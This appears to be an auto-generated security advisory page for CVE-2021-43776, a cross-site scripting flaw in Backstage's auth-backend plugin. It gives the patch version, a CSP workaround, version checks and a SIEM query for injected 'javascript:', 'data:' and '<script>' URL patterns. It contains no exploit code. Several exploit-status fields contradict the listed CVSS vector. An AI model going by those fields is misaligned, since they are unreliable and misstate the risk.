Login Sign Up

CVE-2021-43776

7.4 HIGH
Cross-Site Scripting Authentication Bypass

📋 TL;DR

This Cross-Site Scripting (XSS) vulnerability in Backstage's auth-backend plugin allows attackers to craft malicious URLs that, when visited by users, execute JavaScript in their browsers. This could lead to theft of access tokens and other sensitive data from authenticated users. Organizations using affected Backstage versions with Content Security Policy (CSP) disabled are at risk.

💻 Affected Systems

Products:
  • Backstage auth-backend plugin
Versions: Versions before 0.4.9
Operating Systems: All
Default Config Vulnerable: ✅ No
Notes: Default CSP configuration prevents exploitation. Only deployments with CSP disabled are vulnerable.

📦 What is this software?

Auth Backend by Linuxfoundation

View all CVEs affecting Auth Backend →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal administrative access tokens, gaining full control over the Backstage instance and potentially accessing connected systems and secrets.

🟠

Likely Case

Attackers steal user access tokens, enabling unauthorized access to Backstage resources and potentially compromising developer portal data.

🟢

If Mitigated

With CSP enabled (default configuration), the attack is prevented as CSP blocks execution of malicious scripts.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Requires user interaction (visiting malicious URL) and CSP disabled. Attack chain is straightforward for XSS exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.4.9

Vendor Advisory: https://github.com/backstage/backstage/security/advisories/GHSA-w7fj-336r-vw49

Restart Required: Yes

Instructions:

1. Update @backstage/plugin-auth-backend to version 0.4.9 or later. 2. Run 'npm update @backstage/plugin-auth-backend' or update package.json. 3. Restart Backstage services.

🔧 Temporary Workarounds

Enable Content Security Policy

all

Ensure CSP is enabled and properly configured to block inline scripts and unauthorized script sources.

Configure CSP headers in your Backstage deployment

🧯 If You Can't Patch

  • Ensure CSP is enabled and properly configured with strict directives
  • Implement URL validation and sanitization for user-provided URLs in the auth-backend

🔍 How to Verify

Check if Vulnerable:

Check package.json for @backstage/plugin-auth-backend version. If version < 0.4.9 and CSP is disabled, system is vulnerable.

Check Version:

npm list @backstage/plugin-auth-backend

Verify Fix Applied:

Confirm @backstage/plugin-auth-backend version is 0.4.9 or higher in package.json and verify CSP headers are present in HTTP responses.

📡 Detection & Monitoring

Log Indicators:

  • Unusual authentication attempts
  • Suspicious URL patterns in access logs
  • Multiple failed login attempts from same IP

Network Indicators:

  • Malicious script injection in HTTP requests
  • Unexpected external script loads

SIEM Query:

source="backstage" AND (url="*javascript:*" OR url="*data:*" OR url="*<script>*")

📊 Metadata

CVE ID: CVE-2021-43776
CVSS v3 Score: 7.4 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
CWE: CWE-79
Published: November 26, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-43776, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)